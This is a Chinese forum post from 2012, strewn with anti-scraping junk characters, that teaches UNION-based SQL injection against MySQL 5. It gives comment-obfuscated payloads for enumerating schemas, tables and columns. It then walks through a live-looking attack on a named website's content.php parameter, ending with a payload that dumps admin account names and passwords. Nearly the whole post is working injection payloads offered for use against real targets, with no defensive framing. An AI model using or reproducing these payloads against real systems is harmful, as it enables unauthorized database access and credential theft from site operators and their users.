查库
! c( }" M& }0 e& @# x4 X+ y, m. t9 G# N7 K: r( _& S5 p
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*+ R- A1 Z( N. V, a' f& ?
9 ?4 a6 Z1 J+ M1 z查表
5 j, I" G1 A4 z$ K
$ ]( G. L1 Y2 d) e% f( J: aid=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
7 S* I, `1 d4 {% Y6 g( x3 @9 P' x2 N1 V5 @
查段
$ t. C' I, F O/ x3 z7 p2 K1 {: Q4 d) X$ Z- `4 K( w
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,1
' ~$ i' k8 o7 [( K- u( \+ ~ E! p& t0 S' k- Y2 L- a6 m
1 O: V9 K; Z- Q8 P; \7 _mysql5高级注入方法暴表
3 y& h# ?) }$ ?
( p/ p: T( Y8 |例子如下:5 V& [% s9 R7 N
3 t2 i& u* e. L3 N# u
1.爆表3 o4 f- e( A2 F K) \
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)
' {0 ~, e7 `8 d' V; V1 s! r这样爆到第4个时出现了admin_user表。% V* H+ ]- i1 G& X' E
+ L- O+ l9 N% h- a9 W" P
2.暴字段' |3 t8 W3 z: z' H
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
0 m. A3 A* F! g% B) O: x7 Y1 K' E, a: t% |# k9 b$ ?
% _' g6 d: m) s7 k/ c
3.爆密码+ d" L) m( j% E$ j, Y* {
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/*
# |' B" {7 P- n' Y5 B( A# f
0 y/ |0 q4 q" G% |( K" o% ~$ _' L" l8 s/ m' x; Y" M" p
|
发表于 2012-9-13 16:29:37
收藏
支持
反对